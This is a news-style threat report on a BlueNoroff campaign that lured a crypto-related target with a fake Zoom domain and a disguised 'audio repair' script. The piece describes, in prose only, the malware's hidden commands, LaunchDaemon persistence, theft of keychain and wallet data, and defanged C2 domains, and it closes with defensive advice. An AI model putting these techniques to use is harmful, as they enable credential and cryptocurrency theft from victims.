The Field Effect Analysis team identified a targeted scam associated with BlueNoroff, a North Korean hacker subgroup. A known Canadian gambling company was caught in this scheme, which employed trusted identity verification methods and Zoom. BlueNoroff’s sophisticated method included fake domains such as zoom-tech[.]us to target the victim during a meeting about cryptocurrency.

Attackers claimed there were audio problems and asked the person to run a script named as a Zoom audio repair file. The official report states the script included thousands of blank lines to hide its true, harmful commands. Hidden malware soon followed, enabling the theft of sensitive data, including login credentials and browser account profiles.

This attack demonstrated technical precision, combined with skills in psychological pressure and deception. First, the code moved the victim to zoom-tech[.]us, which WHOIS records show was registered on April 14, 2025. The investigation found that this domain is connected to others using the same misleading WHOIS data. When triggered, the script used CURL and ZSH to fetch more files and a password-harvesting payload.

BlueNoroff Malware Campaign Targets Crypto Wallets with Stealthy macOS Attacks

Stolen user account passwords were sent out during this step, indicating a potential threat from credential theft. After that, a LaunchDaemon setup was put in place, allowing persistent malware to run whenever the system starts. Malware used names like “Wi-Fi Updater” and injected its code into other macOS tasks using special entitlements. Meanwhile, the malware employed different routines to capture browser data, system information, and keychain files using RSYNC and CURL.

Cryptocurrency wallets in browsers such as Brave were targeted in these parallel collection stages. Temporary directories and a deletion tactic for files after running kept the malware presence very low and made it hard to track. Attackers used C2 domains, such as ajayplamingo[.]com and zmwebsdk[.]com, to send stolen data out of the device. This campaign has been active since at least March 2025 and continues to target cryptocurrency operators.

BlueNoroff’s operations have expanded across North America, South Korea, Japan, and Europe, underlining a global financial motive. Cybersecurity teams should watch for the given signs, block unapproved scripts, and train users to resist social engineering.